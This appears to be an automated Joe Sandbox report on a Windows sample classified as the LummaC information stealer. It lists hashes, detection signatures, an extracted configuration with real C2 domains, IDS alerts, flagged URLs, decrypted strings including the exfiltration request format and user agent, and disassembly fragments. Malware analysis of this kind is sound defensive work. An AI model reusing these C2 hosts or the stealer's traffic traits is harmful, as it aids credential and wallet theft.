Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
filename.exe

Overview

General Information

Sample name:filename.exe
Analysis ID:1587439
MD5:b826127052f19e148f3a0cbe6f33b59c
SHA1:9a584be1e8949c627377bccbcb47bbd98f377d92
SHA256:3741c4663479ad4cbc2159dc4c66ff0fef9290ba58da07c33eb4b87b54cdc81d
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • filename.exe (PID: 7512 cmdline: "C:\Users\user\Desktop\filename.exe" MD5: B826127052F19E148F3A0CBE6F33B59C)
    • WerFault.exe (PID: 7736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7512 -s 1856 MD5: F5210A4A7E411A1BAD3844586A74B574)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["bashfulacid.lat", "enterwahsh.biz", "manyrestro.lat", "slipperyloo.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x1188:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 4 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:10.352691+010020283713Unknown Traffic192.168.2.349745104.102.49.254443TCP
            2025-01-10T11:36:11.568040+010020283713Unknown Traffic192.168.2.349754104.21.48.1443TCP
            2025-01-10T11:36:12.519064+010020283713Unknown Traffic192.168.2.349762104.21.48.1443TCP
            2025-01-10T11:36:14.301208+010020283713Unknown Traffic192.168.2.349773104.21.48.1443TCP
            2025-01-10T11:36:15.320339+010020283713Unknown Traffic192.168.2.349779104.21.48.1443TCP
            2025-01-10T11:36:16.483701+010020283713Unknown Traffic192.168.2.349788104.21.48.1443TCP
            2025-01-10T11:36:17.826170+010020283713Unknown Traffic192.168.2.349799104.21.48.1443TCP
            2025-01-10T11:36:18.838630+010020283713Unknown Traffic192.168.2.349805104.21.48.1443TCP
            2025-01-10T11:36:19.840374+010020283713Unknown Traffic192.168.2.349811104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:12.005133+010020546531A Network Trojan was detected192.168.2.349754104.21.48.1443TCP
            2025-01-10T11:36:12.976226+010020546531A Network Trojan was detected192.168.2.349762104.21.48.1443TCP
            2025-01-10T11:36:20.313124+010020546531A Network Trojan was detected192.168.2.349811104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:12.005133+010020498361A Network Trojan was detected192.168.2.349754104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:12.976226+010020498121A Network Trojan was detected192.168.2.349762104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.669950+010020584801Domain Observed Used for C2 Detected192.168.2.3508351.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.644088+010020584841Domain Observed Used for C2 Detected192.168.2.3629751.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.495762+010020586081Domain Observed Used for C2 Detected192.168.2.3561841.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.605984+010020584921Domain Observed Used for C2 Detected192.168.2.3607211.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.620029+010020585001Domain Observed Used for C2 Detected192.168.2.3509601.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.594358+010020585021Domain Observed Used for C2 Detected192.168.2.3563861.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.630241+010020585101Domain Observed Used for C2 Detected192.168.2.3637881.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.658299+010020585121Domain Observed Used for C2 Detected192.168.2.3578591.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:09.581828+010020585141Domain Observed Used for C2 Detected192.168.2.3500721.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:14.719353+010020480941Malware Command and Control Activity Detected192.168.2.349773104.21.48.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T11:36:10.823273+010028586661Domain Observed Used for C2 Detected192.168.2.349745104.102.49.254443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://sputnik-1985.com/api%HAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apiDXAvira URL Cloud: Label: malware
            Source: enterwahsh.bizAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/api.Avira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/VLAvira URL Cloud: Label: malware
            Source: https://bashfulacid.lat/piAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apiceAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com:443/apiAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/Avira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apiSAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com//Avira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apifAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apipAvira URL Cloud: Label: malware
            Source: https://bashfulacid.lat/pic1Avira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apilAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/2LAvira URL Cloud: Label: malware
            Source: https://sputnik-1985.com/apixOAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0.2.filename.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["bashfulacid.lat", "enterwahsh.biz", "manyrestro.lat", "slipperyloo.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat", "tentabatte.lat", "wordyfindy.lat"], "Build id": "HpOoIh--2a727a032c4d"}
            Multi AV Scanner detection for submitted file
            Source: filename.exeVirustotal: Detection: 52%Perma Link
            Source: filename.exeReversingLabs: Detection: 65%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
            Machine Learning detection for sample
            Source: filename.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: enterwahsh.biz
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_004198CA CryptUnprotectData,0_2_004198CA

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\filename.exeUnpacked PE file: 0.2.filename.exe.400000.0.unpack
            Source: filename.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.3:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49788 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.3:49811 version: TLS 1.2
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0040D253
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-330DA216h]0_2_0040D253
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax+51FCD958h]0_2_0040D253
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+557D57D3h]0_2_0042BA6D
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_00437A70
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp byte ptr [eax+ebx+09h], 00000000h0_2_00437A70
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edx, eax0_2_0040E2CE
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx eax, di0_2_00425B20
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_00422BF0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, ecx0_2_00409CA0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_0043ED40
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, edx0_2_00420515
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, ebx0_2_0043D5A1
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h0_2_0043D5A1
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+20h]0_2_0043FE90
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edi, edx0_2_00408710
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-4Ch]0_2_0040AF30
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+557D576Ch]0_2_00421810
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_00426030
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp+0000008Ah]0_2_00426030
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0043D038
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [edi], ax0_2_0043D038
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [edx]0_2_004188D8
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_00429890
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp+0000008Ah]0_2_004268B3
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0041F140
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0043C963
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00434900
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00409120
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0041C13E
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edx, ecx0_2_0040D9CD
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5019A88Eh]0_2_00439187
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h0_2_004251A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h0_2_0043BAC0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D2C4
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov eax, dword ptr [esi+1Ch]0_2_0040CACB
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_0043EAD0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Dh]0_2_0040AA80
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004292A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]0_2_00408AB0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0041D2B1
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_0041EAB0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+557D5777h]0_2_00438360
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edi, dword ptr [esp+30h]0_2_00423300
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0042C32D
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov eax, edi0_2_004093A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00402BA0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov eax, dword ptr [00444DF4h]0_2_0040EC44
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx]0_2_0043F450
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_00427458
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebx, edx0_2_0043E462
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_0043E462
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 7E25290Bh0_2_0043B460
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+62BCD40Bh]0_2_00417C6C
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, ebp0_2_00414C22
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+557D576Bh]0_2_00414C22
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, eax0_2_00416C91
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebx, edx0_2_0043E4D0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_0043E4D0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, eax0_2_00416C91
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, eax0_2_00416D46
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00407550
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00407550
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0042A575
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, edx0_2_0042051D
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00419DD0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0042B5A3
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_00415660
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+687BAFAAh]0_2_00424E30
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_0043E630
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_0043E6E0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_00421EEF
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_0043E770
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi+70h]0_2_004097C0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_004097C0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]0_2_004097C0
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edx, edi0_2_0042AF80
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [eax], cx0_2_024AD29F
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [edi], ax0_2_024AD29F
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_02496297
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_024933FA
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov byte ptr [edi], al0_2_02479387
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov byte ptr [edx], al0_2_0248C3A5
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0248A037
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+20h]0_2_024B00F7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+687BAFAAh]0_2_02495097
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_0249216D
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edx, edi0_2_0249B1E7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+557D576Bh]0_2_024853C5
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov eax, edi0_2_02479607
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 7E25290Bh0_2_024AB6C7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_024976FA
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx]0_2_024AF6B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, edx0_2_02490778
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebx, edx0_2_024AE77B
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+557D5777h]0_2_024A8734
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0249A7DC
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_024777B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_024777B7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+5019A88Eh]0_2_024A97BB
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0247D4BA
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-330DA216h]0_2_0247D4BA
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax+51FCD958h]0_2_0247D4BA
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-4Ch]0_2_0247B571
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02499507
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edx, eax0_2_0247E535
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov word ptr [ecx], bp0_2_0248D536
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edi, dword ptr [esp+30h]0_2_024945E7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0249C594
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0248FA4F
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h0_2_02485A79
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+557D576Ch]0_2_02491A77
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi+70h]0_2_02479A27
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_02479A27
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]0_2_02479A27
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_02499AF7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_024A4B67
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_024ACBCA
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, ebx0_2_024AD808
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 385488F2h0_2_024AD808
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_0249B80A
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h0_2_0249592D
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov edi, edx0_2_02478977
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 385488F2h0_2_0249592F
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_02472E07
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx+62BCD40Bh]0_2_02487ED3
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, eax0_2_02486EF8
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then jmp ecx0_2_024AEE97
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov eax, dword ptr [00444DF4h]0_2_0247EEAB
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov esi, ecx0_2_02479F07
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_024AEFA7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebp+0000008Ah]0_2_02496CC2
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ecx, eax0_2_024A7CD7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then cmp byte ptr [eax+ebx+09h], 00000000h0_2_024A7CD7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+557D57D3h]0_2_0249BCD4
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Dh]0_2_0247ACE7
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]0_2_02478D17
            Source: C:\Users\user\Desktop\filename.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]0_2_0248ED17
